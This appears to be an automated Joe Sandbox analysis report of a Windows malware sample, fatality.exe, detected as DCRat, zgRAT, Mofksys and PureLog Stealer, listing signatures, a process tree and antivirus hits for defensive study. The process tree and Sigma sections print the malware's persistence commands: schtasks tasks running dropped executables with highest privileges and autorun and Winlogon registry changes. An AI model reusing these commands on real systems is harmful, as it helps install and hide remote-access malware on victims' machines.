Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fatality.exe

Overview

General Information

Sample name:fatality.exe
Analysis ID:1590002
MD5:c883ea559bee9a0cb393aa32dcaf5d80
SHA1:995dfd0d9d504bec628e7d7297962677d8ab32cb
SHA256:bfd1aabb65dfce7b7c5f2d444917baa23fd04d6047e62cd1aaf9cb2a9ca9d3a9
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

CryptOne, DCRat, Mofksys, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected CryptOne packer
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Yara detected DCRat
Yara detected Mofksys
Yara detected PureLog Stealer
Yara detected zgRAT
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
PE file has nameless sections
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to detect virtual machines (SGDT)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • fatality.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\fatality.exe" MD5: C883EA559BEE9A0CB393AA32DCAF5D80)
    • fatality.exe (PID: 7456 cmdline: c:\users\user\desktop\fatality.exe MD5: A7040B85FC683F088F4C6E5B44052C43)
      • wscript.exe (PID: 7600 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • containerReview.exe (PID: 7868 cmdline: "C:\blockcomSession/containerReview.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
            • schtasks.exe (PID: 8072 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\Idle.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8108 cmdline: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8136 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\blockcomSession\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • csc.exe (PID: 8152 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 7188 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8F5.tmp" "c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • schtasks.exe (PID: 4092 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 2992 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 1732 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 2516 cmdline: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5724 cmdline: schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 4960 cmdline: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\smss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 2696 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 416 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 4996 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 14 /tr "'C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7244 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7444 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzj" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7568 cmdline: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7460 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 11 /tr "'C:\blockcomSession\containerReview.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7492 cmdline: schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 1880 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 9 /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • icsys.icn.exe (PID: 7488 cmdline: C:\Windows\Resources\Themes\icsys.icn.exe MD5: D36CC2935AE0E7A5D2936DB589A9B8CC)
      • explorer.exe (PID: 7540 cmdline: c:\windows\resources\themes\explorer.exe MD5: 7E24D6E5185E961528CFBCC6840EBBE9)
        • spoolsv.exe (PID: 7560 cmdline: c:\windows\resources\spoolsv.exe SE MD5: DA56FBDFF5925EFBA1E9942139E2A354)
          • svchost.exe (PID: 7592 cmdline: c:\windows\resources\svchost.exe MD5: 5020DD008EA5092AFC4BBD7961322484)
            • spoolsv.exe (PID: 7644 cmdline: c:\windows\resources\spoolsv.exe PR MD5: DA56FBDFF5925EFBA1E9942139E2A354)
  • explorer.exe (PID: 7752 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: 7E24D6E5185E961528CFBCC6840EBBE9)
  • svchost.exe (PID: 5704 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • explorer.exe (PID: 7892 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: 7E24D6E5185E961528CFBCC6840EBBE9)
  • DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe (PID: 7656 cmdline: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • Idle.exe (PID: 7232 cmdline: C:\blockcomSession\Idle.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • Idle.exe (PID: 7468 cmdline: C:\blockcomSession\Idle.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • smss.exe (PID: 7480 cmdline: C:\blockcomSession\smss.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • smss.exe (PID: 404 cmdline: C:\blockcomSession\smss.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
MofksysNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
fatality.exeJoeSecurity_MofksysYara detected MofksysJoe Security
    fatality.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
      fatality.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Windows\Resources\Themes\icsys.icn.exeJoeSecurity_MofksysYara detected MofksysJoe Security
          C:\Windows\Resources\svchost.exeJoeSecurity_MofksysYara detected MofksysJoe Security
            C:\Windows\Resources\spoolsv.exeJoeSecurity_MofksysYara detected MofksysJoe Security
              C:\Windows\Resources\Themes\explorer.exeJoeSecurity_MofksysYara detected MofksysJoe Security
                C:\blockcomSession\Idle.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  Click to see the 13 entries

                  Memory Dumps

                  SourceRuleDescriptionAuthorStrings
                  00000004.00000002.1726064451.0000000000402000.00000080.00000001.01000000.0000000C.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
                    00000001.00000003.1705089952.00000000056A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000007.00000000.1722308050.0000000000401000.00000080.00000001.01000000.0000000C.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
                        00000002.00000002.1733234738.0000000000402000.00000080.00000001.01000000.00000008.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
                          00000004.00000000.1712734504.0000000000401000.00000080.00000001.01000000.0000000C.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
                            Click to see the 24 entries

                            Unpacked PEs

                            SourceRuleDescriptionAuthorStrings
                            2.0.icsys.icn.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                              0.2.fatality.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                                14.2.explorer.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                                  14.0.explorer.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                                    4.2.spoolsv.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                                      Click to see the 20 entries

                                      Sigma Signatures

                                      System Summary

                                      barindex
                                      Sigma detected: Files With System Process Name In Unsuspected Locations
                                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Resources\Themes\icsys.icn.exe, ProcessId: 7488, TargetFilename: c:\windows\resources\themes\explorer.exe
                                      Sigma detected: Suspect Svchost Activity
                                      Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 7560, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 7592, ProcessName: svchost.exe
                                      Sigma detected: System File Execution Location Anomaly
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: c:\windows\resources\themes\explorer.exe, CommandLine: c:\windows\resources\themes\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\Themes\explorer.exe, NewProcessName: C:\Windows\Resources\Themes\explorer.exe, OriginalFileName: C:\Windows\Resources\Themes\explorer.exe, ParentCommandLine: C:\Windows\Resources\Themes\icsys.icn.exe, ParentImage: C:\Windows\Resources\Themes\icsys.icn.exe, ParentProcessId: 7488, ParentProcessName: icsys.icn.exe, ProcessCommandLine: c:\windows\resources\themes\explorer.exe, ProcessId: 7540, ProcessName: explorer.exe
                                      Sigma detected: CurrentVersion Autorun Keys Modification
                                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\blockcomSession\Idle.exe", EventID: 13, EventType: SetValue, Image: C:\blockcomSession\containerReview.exe, ProcessId: 7868, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle
                                      Sigma detected: CurrentVersion NT Autorun Keys Modification
                                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\blockcomSession\Idle.exe", EventID: 13, EventType: SetValue, Image: C:\blockcomSession\containerReview.exe, ProcessId: 7868, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 7868, ParentProcessName: containerReview.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", ProcessId: 8152, ProcessName: csc.exe
                                      Sigma detected: Execution of Suspicious File Type Extension
                                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: c:\users\user\desktop\fatality.exe , CommandLine: c:\users\user\desktop\fatality.exe , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\fatality.exe , NewProcessName: C:\Users\user\Desktop\fatality.exe , OriginalFileName: C:\Users\user\Desktop\fatality.exe , ParentCommandLine: "C:\Users\user\Desktop\fatality.exe", ParentImage: C:\Users\user\Desktop\fatality.exe, ParentProcessId: 7440, ParentProcessName: fatality.exe, ProcessCommandLine: c:\users\user\desktop\fatality.exe , ProcessId: 7456, ProcessName: fatality.exe
                                      Sigma detected: Suspicious Schtasks From Env Var Folder
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f, CommandLine: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 7868, ParentProcessName: containerReview.exe, ProcessCommandLine: schtasks.exe /create /tn "DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe'" /f, ProcessId: 7244, ProcessName: schtasks.exe
                                      Sigma detected: Uncommon Svchost Parent Process
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 7560, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 7592, ProcessName: svchost.exe
                                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\users\user\desktop\fatality.exe , ParentImage: C:\Users\user\Desktop\fatality.exe , ParentProcessId: 7456, ParentProcessName: fatality.exe , ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , ProcessId: 7600, ProcessName: wscript.exe
                                      Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\resources\themes\explorer.exe RO, EventID: 13, EventType: SetValue, Image: C:\Windows\Resources\svchost.exe, ProcessId: 7592, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer
                                      Sigma detected: Dynamic CSharp Compile Artefact
                                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\blockcomSession\containerReview.exe, ProcessId: 7868, TargetFilename: C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline
                                      Sigma detected: Windows Processes Suspicious Parent Directory
                                      Source: Process startedAuthor: vburov: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 7560, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 7592, ProcessName: svchost.exe

                                      Data Obfuscation

                                      barindex
                                      Sigma detected: Dot net compiler compiles file from suspicious location
                                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 7868, ParentProcessName: containerReview.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline", ProcessId: 8152, ProcessName: csc.exe

                                      Persistence and Installation Behavior

                                      barindex
                                      Sigma detected: Schedule system process
                                      Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f, CommandLine: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 7868, ParentProcessName: containerReview.exe, ProcessCommandLine: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\smss.exe'" /f, ProcessId: 2516, ProcessName: schtasks.exe

                                      Suricata Signatures

                                      No Suricata rule has matched

                                      Joe Sandbox Signatures

                                      Click to jump to signature section

                                      Show All Signature Results

                                      AV Detection

                                      barindex
                                      Antivirus / Scanner detection for submitted sample
                                      Source: fatality.exeAvira: detected
                                      Antivirus detection for dropped file
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                      Source: C:\Windows\Resources\svchost.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                                      Source: C:\Users\user\Desktop\zRrwKlet.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                      Source: C:\blockcomSession\Idle.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                      Source: C:\Users\user\AppData\Local\Temp\Q048Q85hCW.batAvira: detection malicious, Label: BAT/Delbat.C
                                      Source: C:\Users\user\Desktop\fatality.exe Avira: detection malicious, Label: VBS/Runner.VPG
                                      Source: C:\Users\user\Desktop\SdSCeHzI.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                      Source: C:\Windows\Resources\Themes\explorer.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                                      Source: C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                      Source: C:\Windows\Resources\spoolsv.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                                      Multi AV Scanner detection for dropped file
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeReversingLabs: Detection: 82%
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeVirustotal: Detection: 76%Perma Link
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeReversingLabs: Detection: 82%
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeVirustotal: Detection: 76%Perma Link
                                      Source: C:\Users\user\Desktop\FJTVnRjh.logVirustotal: Detection: 10%Perma Link
                                      Source: C:\Users\user\Desktop\SdSCeHzI.logReversingLabs: Detection: 70%
                                      Source: C:\Users\user\Desktop\SdSCeHzI.logVirustotal: Detection: 69%Perma Link
                                      Source: C:\Users\user\Desktop\XWvbHmEw.logReversingLabs: Detection: 37%
                                      Source: C:\Users\user\Desktop\ZKzjsAAu.logReversingLabs: Detection: 25%
                                      Source: C:\Users\user\Desktop\fatality.exe ReversingLabs: Detection: 71%
                                      Source: C:\Users\user\Desktop\hEPrrPJe.logReversingLabs: Detection: 29%
                                      Source: C:\Users\user\Desktop\zRrwKlet.logReversingLabs: Detection: 50%
                                      Source: C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeReversingLabs: Detection: 82%
